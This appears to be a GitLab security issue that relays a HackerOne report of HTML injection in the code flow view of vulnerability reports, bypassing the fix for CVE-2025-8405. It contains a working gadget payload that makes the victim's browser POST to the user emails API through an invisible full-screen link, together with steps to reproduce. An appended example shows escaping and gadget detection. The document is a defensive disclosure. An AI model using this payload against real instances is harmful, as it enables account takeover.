HTML injection in vulnerability reports (CVE-2025-8405 bypass)

⚠️ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #3461083 by joaxcar on 2025-12-10, assigned to @katwu:

Original Report

Summary

I am not completely sure what the fix for CVE-2025-8405 was (except for killing one gadget). But the vulnerability can still be triggered and other gadgets can be used.

For example, this one:

<div class="js-new-user-signups-cap-reached" data-dismiss-endpoint="/api/v4/user/emails?email=adddddd@test.se" data-defer-links="false" data-feature-id="1">
<a target=x href="https://joaxcar.com/fun/delay/vuln.html" class="js-close fixed-top gl-opacity-0 gl-h-full gl-w-full">
hack
</a>
</div>

Steps to reproduce
  1. Create a new Ultimate project
  2. Import this project into the new group 2025-12-10_21-42-715_ultimate-test-18-6-2_code-flow_export.tar.gz
  3. Run a pipeline in the project
  4. Go to /-/security/vulnerabilities and click the one on top
  5. Go to code flow
  6. See that the payload renders in the code box

Impact

HTML injection that can trigger user actions through a POST request. Bypass of CVE-2025-8405.

What is the current bug behavior?

HTML still renders

What is the expected correct behavior?

HTML should not render

Output of checks

This bug happens on GitLab.com

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:
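
For the expected behavior stated in the report (HTML should not render), the following is an added example, not part of the report and not GitLab's code. It escapes a code-box line at render time and checks that no `js-*` class or `data-*` attribute hook survives, which covers every gadget instead of one. The function names, the `<span class="line">` wrapper, and the sample's endpoint and URL are assumptions or placeholders.

```javascript
// Added example: hypothetical helpers, not GitLab's code.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text so the browser shows it as characters, never as markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Render one source line of a code box; the wrapper is the only tag emitted.
// The <span class="line"> markup is an assumption made for this example.
function renderCodeLine(source) {
  return `<span class="line">${escapeHtml(source)}</span>`;
}

// Regression check: list the script hooks (js-* classes, data-* attributes)
// carried by any tag that survives in rendered output.
function gadgetHooks(html) {
  const hooks = [];
  for (const [tag] of html.matchAll(/<[a-zA-Z][^>]*>/g)) {
    for (const [, value] of tag.matchAll(/\bclass\s*=\s*["']([^"']*)["']/gi)) {
      for (const name of value.split(/\s+/)) {
        if (name.startsWith('js-')) hooks.push(`class:${name}`);
      }
    }
    for (const [, attr] of tag.matchAll(/\s(data-[a-z0-9-]+)\s*=/gi)) {
      hooks.push(`attr:${attr.toLowerCase()}`);
    }
  }
  return [...new Set(hooks)];
}

// Constructed sample modelled on the report's snippet; endpoint and URL are placeholders.
const SAMPLE =
  '<div class="js-new-user-signups-cap-reached" data-dismiss-endpoint="/placeholder" data-feature-id="1">' +
  '<a href="https://example.test/" class="js-close fixed-top">hack</a></div>';

const rendered = renderCodeLine(SAMPLE);
console.log('hooks if inserted raw:', gadgetHooks(SAMPLE));
console.log('hooks after escaping: ', gadgetHooks(rendered));
console.log(rendered);
```

A check like `gadgetHooks` belongs in a regression test over the rendered output, so a future change that reintroduces raw rendering fails regardless of which gadget a payload targets.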